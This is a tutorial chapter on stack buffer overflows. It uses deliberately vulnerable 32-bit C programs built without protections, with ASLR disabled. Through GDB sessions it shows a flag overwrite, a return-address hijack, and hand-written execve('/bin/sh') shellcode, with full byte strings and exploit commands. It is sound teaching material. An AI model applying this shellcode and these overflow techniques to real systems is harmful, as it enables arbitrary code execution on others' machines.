Interacting with memory is part of every non-trivial program. In order to guarantee successful data processing, it is of utmost importance to correctly manage data buffer sizes. Writing more data than the buffer is able to contain, results in a so-called buffer overflow. The memory region following directly afterwards is overwritten in this case. This chapter tries to explain this behavior and its effect in a detailed and practical way.
Modern compilers and operating systems include protection mechanisms to avoid the effects of buffer overflows. For the sake of simplicity, these mechanisms are neglected for now and explained in later chapters. Example codes include compilation instructions in the first line to disable optimizations and protection mechanisms. All examples but the first one require that ASLR is disabled. Following command disables ASLR on a Linux system until it is enabled again or the machine is rebooted.
$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
To enable ASLR again, use the command below.
$ echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
As disabling ASLR and running binaries without compiler protection mechanisms imposes a security risk, it is recommended to apply this change and execute the vulnerable applications in a virtual machine or protected environment.
Keeping the theoretical concept from above in mind, a first practical example is presented next.
The code below asks the user for his name and prints whether he is an administrator or not. A user is classified as an administrator if the entered name is „admin“.
// gcc -g -O0 -m32 -std=c99 control.c #include <stdio.h> #include <string.h> #include <stdbool.h> struct User { char name[8]; bool is_admin; }; int main() { struct User user = {0}; printf("Enter user name:\n"); gets(user.name); if(strcmp(user.name, "admin") == 0) user.is_admin = true; if(user.is_admin) printf("Welcome back administrator!\n"); else printf("Meh, hello %s. I was hoping for the administrator.\n", user.name); return 0; }
Executing the code and entering „nufan“ as name results in the output shown below.
$ ./a.out Enter user name: nufan Meh, hello nufan. I was hoping for the administrator.
Assuming basic knowledge about the C programming language, this behavior should be no surprise. While the code is short and straightforward, it still contains a significant security vulnerability. user.name
is a character array with a fixed size of 8 bytes. At the same time, the gets()
function does not limit the length of the input. Next, we intentionally exceed the available input capacity.
$ ./a.out Enter user name: 123456789 Welcome back administrator!
According to the output we are classified as an administrator although an incorrect name was entered. To retrace this behavior, we will have a look at the memory content after the initialization and after each of the above input cases. GDB is used to inspect the memory of the user
variable. Additionally, the relevant memory region is visualized to ease the understanding.
First, the state of the user
variable is inspected directly after initialization. A breakpoint is set in line 16 to stop execution and print the user
variable.
$ gdb -q a.out Reading symbols from a.out...done. (gdb) break 16 Breakpoint 1 at 0x647: file control.c, line 16. (gdb) run Starting program: /home/memory-corruption/a.out Breakpoint 1, main () at control.c:16 16 printf("Enter user name:\n"); (gdb) p user $1 = {name = "\000\000\000\000\000\000\000", is_admin = false}
Below you can see a memory-oriented visualization of the GDB output.
Just like before, we first enter the short name „nufan“ and look at the resulting application state. To inspect the variable before exiting the application we set a breakpoint at the return
statement in line 26.
(gdb) break 26 Breakpoint 2 at 0x565556b8: file control.c, line 26. (gdb) continue Continuing. Enter user name: nufan Meh, hello nufan. I was hoping for the administrator. Breakpoint 2, main () at control.c:26 26 return 0; (gdb) p user $2 = {name = "nufan\000\000", is_admin = false}
As expected, the memory content looks reasonable. Nevertheless, we still have to look at the second - and much more interesting - case. Using „123456789“ as name exceeds the space of user.name
and results in the following state.
$ gdb -q a.out Reading symbols from a.out...done. (gdb) break 26 Breakpoint 1 at 0x6b8: file control.c, line 26. (gdb) run Starting program: /home/memory-corruption/a.out Enter user name: 123456789 Welcome back administrator! Breakpoint 1, main () at control.c:26 26 return 0; (gdb) p user $1 = {name = "12345678", is_admin = 57}
The user.name
buffer was completely filled up. Due to the fact that even more data was entered, the '9' character (ASCII value 57) was spilled over to the consecutive variable user.is_admin
. Remember that in the C programming language every value other than 0 is considered to be true. Thus, the application classifies the user as administrator.
Simply by overflowing an input buffer the control flow of the application was redirected to an unintended execution branch. Although this example seems harmless as the control flow differs only by a static output, this vulnerability could equally overwrite crucial user data1) or allow an attacker to take full control over the application.
While the previous example already made use of the concept of a buffer overflow, it is rather limited as it is restricted to the use of a predefined control flow branch. With the next example we will take the exploitation one step further.
The example code copies the first command line argument to a variable located on the stack.
// gcc -g -O0 -m32 -no-pie -fno-pie -mpreferred-stack-boundary=2 function.c #include <stdio.h> #include <string.h> void admin_stuff() { printf("Welcome back administrator!\n"); } int main(int argc, char *argv[]) { char buffer[8] = {0}; if(argc != 2) { printf("A single argument is required.\n"); return 1; } printf("Copying \"%s\"\n", argv[1]); strcpy(buffer, argv[1]); return 0; }
Clearly, strcpy()
copies an input of variable size into a buffer of fixed size. Note that the code contains a function admin_stuff()
which is not part of the regular control flow. However, in contrast to the previous example, no local variable determining the control flow is located on the stack. This time we will not try to switch to a predefined execution branch, rather we want to call admin_stuff()
which is an existing function within the binary but outside of any control flow2). Considering the background knowledge explained in the previous chapter about program execution and function calls, we extend the view of the memory to include the information about the stack frame.
The behavior of the application under normal circumstances is observed in GDB. Checking the memory directly after the initialization of the buffer, the top of the stack looks as follows.
$ gdb -q a.out Reading symbols from a.out...done. (gdb) set backtrace past-main (gdb) break 14 Breakpoint 1 at 0x804848d: file function.c, line 14. (gdb) break 23 Breakpoint 2 at 0x80484d2: file function.c, line 23. (gdb) run ABCD Starting program: /home/memory-corruption/a.out ABCD Breakpoint 1, main (argc=2, argv=0xffffd444) at function.c:14 14 if(argc != 2) (gdb) x/4wx $esp 0xffffd3a0: 0x00000000 0x00000000 0x00000000 0xf7e11286
We can identify 8 bytes of the buffer
variable, 4 bytes of the saved EBP
register and the 4 byte return address. Just before finishing execution, the second breakpoint causes the execution to stop.
(gdb) continue Continuing. Copying "ABCD" Breakpoint 2, main (argc=2, argv=0xffffd444) at function.c:23 23 return 0; (gdb) x/4wx $esp 0xffffd3a0: 0x44434241 0x00000000 0x00000000 0xf7e11286
Now the buffer is partially filled with the entered data. Observe the little-endian byte order of the values.
The goal of this exercise is to overwrite the return address 0xf7e11286
on the stack. Instead of returning to the previous function on the call stack, the control flow should be redirected to the admin_stuff()
function. With the protection mechanisms ASLR and PIE disabled, the function has a static address within the binary and at runtime. nm
is used to resolve the address of the symbol.
$ nm a.out | grep admin_stuff 08048466 T admin_stuff
This output shows that the admin_stuff()
symbol is located at address 0x08048466
in the text segment of the binary.
In order to overwrite the return address, the 8 byte buffer
and the 4 byte EBP
copy need to be skipped first. „ABCDEFGHIJKL“ is chosen to fill up this region. The payload is terminated by the address of admin_stuff()
(0x08048466
) in little-endian format.
$ gdb -q a.out Reading symbols from a.out...done. (gdb) break 23 Breakpoint 1 at 0x80484d2: file function.c, line 23. (gdb) run $(echo -en "ABCDEFGHIJKL\x66\x84\x04\x08") Starting program: /home/memory-corruption/a.out $(echo -en "ABCDEFGHIJKL\x66\x84\x04\x08") Copying "ABCDEFGHIJKLf[?]" Breakpoint 1, main (argc=0, argv=0xffffd434) at function.c:23 23 return 0; (gdb) x/4wx $esp 0xffffd390: 0x44434241 0x48474645 0x4c4b4a49 0x08048466 (gdb) continue Continuing. Welcome back administrator! Program received signal SIGSEGV, Segmentation fault. 0x00000000 in ?? ()
Proven by the output, the admin_stuff()
function is really executed. Due to the corrupted stack layout the program crashes directly after the execution of the function with a segmentation fault. Remember that strcpy()
writes a \0
byte to finalize the destination string which was neglected in the illustrations. All addresses are constant over multiple executions, so the exploit also works outside GDB and with arbitrary fill values for the memory region before the return address.
$ ./a.out $(echo -en "000000000000\x66\x84\x04\x08") Copying "000000000000f[?]" Welcome back administrator! Segmentation fault
Although functionally identical to the previous example, the vulnerable program of this section has a larger buffer but does not contain any predefined function we want to call. Additionally, the address of the buffer is printed upon execution.
// gcc -g -O0 -m32 -no-pie -fno-pie -mpreferred-stack-boundary=2 -z execstack execve.c #include <stdio.h> #include <string.h> int main(int argc, char *argv[]) { char buffer[32] = {0}; if(argc != 2) { printf("A single argument is required.\n"); return 1; } printf("Buffer: %p\n", buffer); strcpy(buffer, argv[1]); return 0; }
The first step is to redirect execution to the data copied to the buffer. This is accomplished by filling up the 32 bytes of buffer
plus the 4 bytes of the saved EBP
register and overwriting the return address with the address of the buffer. We will first try this in GDB. It is important to note that addresses slightly differ when the application is executed within the debugger. Also note that command line arguments and environment variables are located on the stack and thus influence the address of the buffer
array. Execute the application with arbitrary parameters of the intended length to find out the address of the buffer. During the following example the buffer is assumed to be located at 0xffffd358
.
$ gdb -q ./a.out Reading symbols from ./a.out...done. (gdb) set disassembly-flavor intel (gdb) disassemble main Dump of assembler code for function main: 0x08048466 <+0>: push ebp [...] 0x080484d1 <+107>: ret End of assembler dump. (gdb) break *0x080484d1 Breakpoint 1 at 0x080484d1: file execve.c, line 19. (gdb) run $(echo -ne "12345678901234567890123456789012AAAA\x58\xd3\xff\xff") Starting program: /home/memory-corruption/a.out $(echo -ne "12345678901234567890123456789012AAAA\x58\xd3\xff\xff") Buffer: 0xffffd358 Breakpoint 1, 0x080484d1 in main (argc=0, argv=0xffffd414) at execve.c:19 20 } (gdb) ni 0xffffd358 in ?? ()
As the last line of the output indicates, the execution was successfully redirected to the buffer. However, when inspecting the instructions at this location, no meaningful code can be identified:
(gdb) x/s $eip 0xffffd358: "12345678901234567890123456789012AAAAX\323\377\377" (gdb) x/5i $eip => 0xffffd358: xor DWORD PTR [edx],esi 0xffffd35a: xor esi,DWORD PTR [esi*1+0x39383736] 0xffffd361: xor BYTE PTR [ecx],dh 0xffffd363: xor dh,BYTE PTR [ebx] 0xffffd365: xor al,0x35 (gdb) continue Continuing. Program received signal SIGSEGV, Segmentation fault. 0xffffd35a in ?? ()
The program crashes because of invalid memory accesses. Totally understandable, as we only wanted to fill up the memory and did not care about mapping its content to instructions yet. What we need at this point is executable code in compiled form. Generating this code using a high-level programming language most likely introduces unintended instructions, so we fall back to assembly. More specifically, we will use the NASM3) with Intel syntax4) to create our so-called shellcode.
Our final goal is to execute the shell /bin/sh
via the execve
system call5)6). Calling execve
has the following requirements when the interrupt is triggered:
EAX
contains an identifier for the system call and needs to have the value 11 (0x0b
) for execve
.EBX
points to the (\0
-terminated) name of the executable to be executed („/bin/sh“ in our case).ECX
points to argv
, this means it represents an array that contains at least a pointer to the executable name (as referenced by EBX
) and is terminated with a NULL
-pointer.EDX
points to envp
. As we do not need environment variables for the execution, we can simply set it to NULL
.
First we need to correct the stack pointer. When returning from the main
function, the stack frame is destroyed by increasing ESP
. Our buffer is still there, but ESP
was moved to a higher memory address. As we want to push some values, we need to make sure ESP
points to a memory address lower than our buffer and we do not overwrite our own code. Subtracting 0x30
(48) is a good guess as we want to skip the return address (4 bytes), the saved EBP
(4 bytes), buffer
(32 bytes) and possibly some stack-alignment padding introduced by the compiler.
sub esp,0x30
Next, we need the \0
-terminated string „/bin/sh“ on the stack. As the stack grows from bottom (high memory addresses) to top (low memory addresses), we need to push the string in reverse order. Thus we start with the termination character \0
. Keep in mind that we are using strcpy()
to copy the data. It has the property to stop copying at a \0
character in the source string, so we are not allowed to have any 0 values in the compiled code. Luckily, there are several ways to calculate 0 without explicitly mentioning it. One common way is to xor a value with itself, which always results in 0 regardless of the used value.
xor eax,eax
We do not have to care about the size of this termination value, so we push the 4 byte register to the stack:
push eax
The remaining string is 7 characters long. To push it as 2 words of 4 byte each, we need to add a fill character. „//bin/sh“ is an equivalent but 8 character alternative to „/bin/sh“.
push 0x68732f6e ; hs/n push 0x69622f2f ; ib//
Now that the string is set up correctly, the registers need to be filled accordingly. EBX
needs to point to the name of the binary to execute. „//bin/sh“ was pushed to the stack with the previous commands. Hence, ESP
is a pointer to this string and can be copied to EBX
.
mov ebx,esp
Successful execution requires argv
to be set correctly. This convention is also visible in C programs: argv
is an array of pointers to strings (char *argv[]
) and terminated by a NULL
value. argv[0]
contains the executable name.
push eax ; argv[1] = NULL push ebx ; argv[0] = "//bin/sh"
ECX
needs the point to this array of pointers.
mov ecx,esp
Because no environment variables are needed, envp
, which is passed via EDX
, is set to NULL
.
mov edx,eax
Lastly, the system call number is set to 11 (0x0b
) and the interrupt triggered.
mov al,0xb int 0x80
We are done! Here is the full code:
; nasm -f elf32 execve.s sub esp,0x30 xor eax,eax push eax push 0x68732f6e push 0x69622f2f mov ebx,esp push eax push ebx mov ecx,esp mov edx,eax mov al,0xb int 0x80
After translation with the nasm
assembler, objdump
is used to extract the executable code from the compiled object file.
$ objdump -d -M intel-mnemonic execve.o execve.o: file format elf32-i386 Disassembly of section .text: 00000000 <.text>: 0: 83 ec 30 sub esp,0x30 3: 31 c0 xor eax,eax 5: 50 push eax 6: 68 6e 2f 73 68 push 0x68732f6e b: 68 2f 2f 62 69 push 0x69622f2f 10: 89 e3 mov ebx,esp 12: 50 push eax 13: 53 push ebx 14: 89 e1 mov ecx,esp 16: 89 c2 mov edx,eax 18: b0 0b mov al,0xb 1a: cd 80 int 0x80
A little bit of Bash magic helps to extract the opcodes and bring them into a usable form.
$ for i in `objdump -d execve.o | sed -n '8,$p' | cut -f2`; do echo -En \\x$i; done \x83\xec\x30\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80
The command calls objdump
and uses sed
to drop the first seven lines of the output. cut
is applied to get the second column in each line, which is the opcode of the instruction. A loop over these opcodes adds the required \x
prefix to the output.
Count the number of bytes used for the payload to calculate the required padding.
$ for i in `objdump -d execve.o | sed -n '8,$p' | cut -f2`; do echo -en \\x$i; done | wc -c 28
To fill up 36 bytes (32 byte buffer + 4 byte EBP
) a padding of 8 bytes is required. „12345678“ was chosen in this case.
Feeding this exploit into the application results in a command prompt.
$ ./a.out $(echo -en "\x83\xec\x30\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x8012345678\xb8\xd3\xff\xff") Buffer: 0xffffd3b8
Depending on the command line settings, one might not notice the difference between the spawned shell and the simple termination of the binary. Executing the same command under strace
and filtering for execve
calls proves the execution of //bin/sh
from the vulnerable binary.
$ strace -e execve ./a.out $(echo -en "\x83\xec\x30\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x8012345678\xb8\xd3\xff\xff") execve("./a.out", ["./a.out", "\203\35401\300Phn/shh//bi\211\343PS\211\341\211\302\260\v\315\2001234"...], 0x7fffffffe258 /* 47 vars */) = 0 strace: [ Process PID=10599 runs in 32 bit mode. ] Buffer: 0xffffd3b8 execve("//bin/sh", ["//bin/sh"], NULL) = 0 strace: [ Process PID=10599 runs in 64 bit mode. ]
The overall memory state correlated with the assembly code is shown in the visualization below.
Finally we managed to execute arbitrary code by exploiting a buffer overflow vulnerability!
The examples above copied data passed as command line parameters. Another common data source is the standard input stream. As the exploitation via the standard input stream involves overcoming a common pitfall, it is observed with the following example.
// gcc -g -O0 -m32 -std=c99 -mpreferred-stack-boundary=2 -z execstack stdin.c #include <stdio.h> int main(int argc, char *argv[]) { char input[32] = {0}; printf("Buffer: %p\n", input); gets(input); return 0; }
Inspecting the code shows that the application prints the address of the buffer and then reads data from the standard input via the gets()
function. Following explanation assumes the buffer is located at the address 0xffffd324
.
Using the shellcode from the previous section results in the payload structure listed next.
0xffffd324
)A Perl command helps to generate the input for the exploit. Even if you are not familiar with Perl, make sure you are able to understand and generate inputs in a scripting language (e.g. Python or Bash are perfectly fine as well).
$ perl -e 'print "\x83\xec\x30\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" . "aaaabbbbcccc" . "\x24\xd3\xff\xff" . "\n"' \ | ./a.out Buffer: 0xffffd324 $ echo $? 0
The program exits successfully but without providing us a shell to execute commands. Let's use strace
to inspect what is going on.
$ perl -e 'print "\x83\xec\x30\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" . "aaaabbbbcccc" . "\x24\xd3\xff\xff" . "\n"' \ | strace ./a.out [...] execve("//bin/sh", ["//bin/sh"], NULL) = 0 [...] read(0, "", 8192) = 0 exit_group(0) = ?
The output shows that the shell was actually started, but closed immediately afterwards. Although confusing at the beginning, the explanation for this behavior is reasonable. After the shell is started up, it tries to read a command from the standard input. While the input stream was used for sending the payload to the application, we implicitly closed it afterwards. As the shell realizes there is no more input to read, it exits silently. To keep the shell open and enter commands manually, we need to keep the input stream open. One possibility to do so is the following.
$ cat <(perl -e 'print "\x83\xec\x30\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" . "aaaabbbbcccc" . "\x24\xd3\xff\xff" . "\n"') -\ | ./a.out
<()
is the process substitution operator and replaces the standard input stream of cat
with the command between the parentheses which in our case is a Perl command. Additionally, with the -
as second parameter, we signal cat
to read from the standard input. cat
first takes the output of the command in the parentheses and writes it to the pipe to a.out
. Keeping the stream open, it still waits for input on the standard input stream which is also passed on through the pipe7).
← Back to program execution details | Overview | Continue with NOP selds → |